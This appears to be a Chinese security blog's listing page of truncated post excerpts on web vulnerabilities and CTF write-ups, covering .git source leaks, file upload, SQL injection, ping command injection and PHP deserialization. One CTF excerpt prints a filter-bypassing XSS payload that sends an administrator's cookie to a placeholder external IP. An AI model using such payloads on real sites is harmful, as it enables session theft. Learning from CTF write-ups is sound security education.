前言源码泄露也是CTF比赛和实际运维环境常见到的漏洞，所以这次对常见的源码泄露方式进行总结。 一. .git源码泄露gitgit是一个常见的分布式版本控制软件，简单的说，就是便于管理者在不同的文件版本之间切换的软件。 在Git系统中有四种类型的对象，所有的Git操作都是基于这四种类型的对象。 & ...

前言最近在对之前学的东西进行总结和复习，发现自己竟然没有系统的学习文件上传漏洞，罪过罪过。然后这两天看了视频讲解，对文件上传漏洞有了系统的了解，下面听我慢慢说来。 漏洞原理文件上传漏洞的成因，是程序员在对用户进行文件上传的部分控制不足或者处理不当，导致用户能越权向服务器上传可执行脚本文件，也就是大家 ...

前言​ SQL注入(SQL Injection)一直是WEB安全中常谈到的一个漏洞,在网络中，数据库常支持着Web应用，因此而存在的SQL注入是最容易影响企业运营和最具破坏性的漏洞之一。 漏洞原理1.什么是SQL？​ SQL 是一门 ANSI 的标准计算机语言，用来访问和操作数据库系统。 ...

题目描述和此题关系不大，刚开始尝试输入www.baidu.com时,并没有返回任何的结果，可能是没有进行域名解析。后来尝试输入**127.0.0.1**，ping通了。那么，就利用管道符尝试一下，能否遍历出服务器当前目录下的文件，返回Invalid URL，依旧是没有获得什么有用信息。 看到域 ...

​ 上个月初周末连着打了两场，湖湘杯和红帽杯，本想着比赛完抽个时间把WriteUp补补，题目照着wp再做一遍，各种原因推到这个月，然后赛题环境也被关了。。。两场下来拼死做了两三个题，差的还是有点多，这次依旧贴上网上的WriteUp。 webTicket_System查看源码，得到暗示/h ...

webuntar直接访问题目可以看到源码 12345678910111213141516<?php $sandbox = "sandbox/" . md5($_SERVER["REMOTE_ADDR"]); echo $sandbox."</br>"; @mkdi ...

什么是php反序列化(unserialize)说到反序列化，就得先了解什么是序列化。PHP序列化（serialize），就是将代码中定义好的对象、数组等序列化为字符串，反序列化（unserialize），就是反其道而行之，反序化和序列化过程就有点像平时打包快递和拆快递的两个不同过程。 使用序列化的好 ...

ezxss知识点：xss writeup： 双写绕过过滤，获取管理员cookie，payload如下： 123<img src="123" onerronerroror="windwindow.openow.open('http://xxx.xxx.xxx.xxx? cookie='+d ...

​ 上个月月末，工作室的学长们带着打了一场oppo的比赛，才发现自己原来菜的那么真实。。。任重而道远吧。想着开学没过多久，就对之前一年的生活做一个总结。虽然院里成绩尚可（专业排名第五?），但是还是在游戏和午休上浪费了不少的学习时间，当初要是能把这些时间用到复习上，或许能冲冲国家奖学金了 ...

就不让你访问 ​ 刚开始接触这道题，没有想太多，还是常规的检查URL、源代码、抓包、扫后台，扫后台的时候扫到了几个特殊的地址，看到Robots就有点开心了，里面应该是有文章。 ​ robots协议，就是告诉网页爬虫，哪些网页不能让你爬取，所以，我们将”Disallow ...